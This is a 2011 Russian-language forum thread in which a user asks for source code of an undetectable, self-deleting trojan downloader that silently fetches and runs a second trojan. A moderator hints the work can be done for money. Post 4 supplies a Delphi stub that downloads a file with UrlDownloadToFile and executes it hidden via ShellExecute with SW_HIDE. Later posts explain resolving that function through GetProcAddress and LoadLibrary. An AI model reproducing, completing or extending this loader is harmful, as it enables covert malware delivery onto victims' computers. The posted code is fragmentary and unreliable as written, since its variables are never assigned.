|
Trojan.Downloader
|
|
| -Drayver- | Дата: Пятница, 11.03.2011, 15:28 | Сообщение # 1 |
Был не раз
Зарегистрирован: 01.03.2011
Группа: Пользователи
Сообщений: 10
Статус: Offline
| Поделитесь исходником етого трояна.
Если возможно сразу с даннымы функциямы.Главное чтоб не палим был.
После открытия троя - он самоудаляется,скачеет с данного сервера второй трой он весит 3.2м второй трой тоже самоудаляеться только требуется чтобы трой скачал скритно и запустил файл.
Если можно(было бы не плохо поставить таймер на скачку а точнее чтобы не сразу скачал)
Всем заранее спасибо.Надеюсь на вашу помощь.
|
| |
| |
| gravitas | Дата: Пятница, 11.03.2011, 18:26 | Сообщение # 2 |
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| Модуль UrlMon. Процедура UrlToFile вроде бы.
Тут вопросы, а не заказы на софт, да еще и за бесплатно.
|
| |
| |
| Anton93 | Дата: Пятница, 11.03.2011, 19:19 | Сообщение # 3 |
Продвинутый
Зарегистрирован: 06.01.2010
Группа: Модераторы
Сообщений: 320
Статус: Offline
| за валюту всё решаемо  
|
| |
| |
| Sector009 | Дата: Суббота, 16.07.2011, 19:40 | Сообщение # 4 |
Был не раз
Зарегистрирован: 07.10.2010
Группа: Пользователи
Сообщений: 6
Статус: Offline
| Code program pr1;
uses
urlmon,
ShellApi,
windows,
Sockets;
procedure d1;
var
file,dir,site:string;
Begin
UrlDownLoadToFile(nil, Pchar(site+'/ '+file), Pchar(dir+'/ '+file), 0, nil);
ShellExecute(0,' OPEN',dir+'/'+file,Nil,Nil, SW_HIDE);
sleep(100);
exit;
end;
begin
end.
Gravitas: используем теги.
|
| |
| |
| raviti2 | Дата: Суббота, 16.07.2011, 21:30 | Сообщение # 5 |
|
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
| Доступно только для пользователей
Сообщение отредактировал raviti2 - Суббота, 16.07.2011, 21:32 |
| |
| |
| gravitas | Дата: Воскресенье, 17.07.2011, 19:53 | Сообщение # 6 |
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
| raviti2, вы не так поняли значение слова "лоадер"... Посмотрите пост №4 - там примерно то, что нужно было ТС'у.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
| |
| Lauri | Дата: Пятница, 29.07.2011, 12:45 | Сообщение # 7 |
|
Новичок
Зарегистрирован: 28.07.2011
Группа: Пользователи
Сообщений: 4
Статус: Offline
| А как например выдрать функцию UrlDownloadToFIle из urlmon?
|
| |
| |
| C@T | Дата: Пятница, 29.07.2011, 21:08 | Сообщение # 8 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| Quote (Lauri) А как например выдрать функцию UrlDownloadToFIle из urlmon?
можно просто написать что ты ее импортируешь, можно вызвать GetProcAddr и получить адресс функции
Code
GetProcAddr(LoadLibrary('urlmon.dll'),'UrlDownloadToFIleA');
а если тебе именно сам код функции нужен то можно дизасемблировать urlmon.dll и посмотреть в ней эту функцию
|
| |
| |
| Lauri | Дата: Суббота, 30.07.2011, 16:20 | Сообщение # 9 |
|
Новичок
Зарегистрирован: 28.07.2011
Группа: Пользователи
Сообщений: 4
Статус: Offline
| Quote (C@T) Quote (Lauri)А как например выдрать функцию UrlDownloadToFIle из urlmon? можно просто написать что ты ее импортируешь, можно вызвать GetProcAddr и получить адресс функции view plaincopy to clipboardprint?
GetProcAddr(LoadLibrary('urlmon.dll'),'UrlDownloadToFIleA');
GetProcAddr(LoadLibrary('urlmon.dll'),'UrlDownloadToFIleA');
а если тебе именно сам код функции нужен то можно дизасемблировать urlmon.dll и посмотреть в ней эту функцию
я смотрел urlmon.pas думал выдернуть саму функцию оттуда, как залез... столько кода что ппц + всё взаимосвязано так что хз как быть 
|
| |
| |
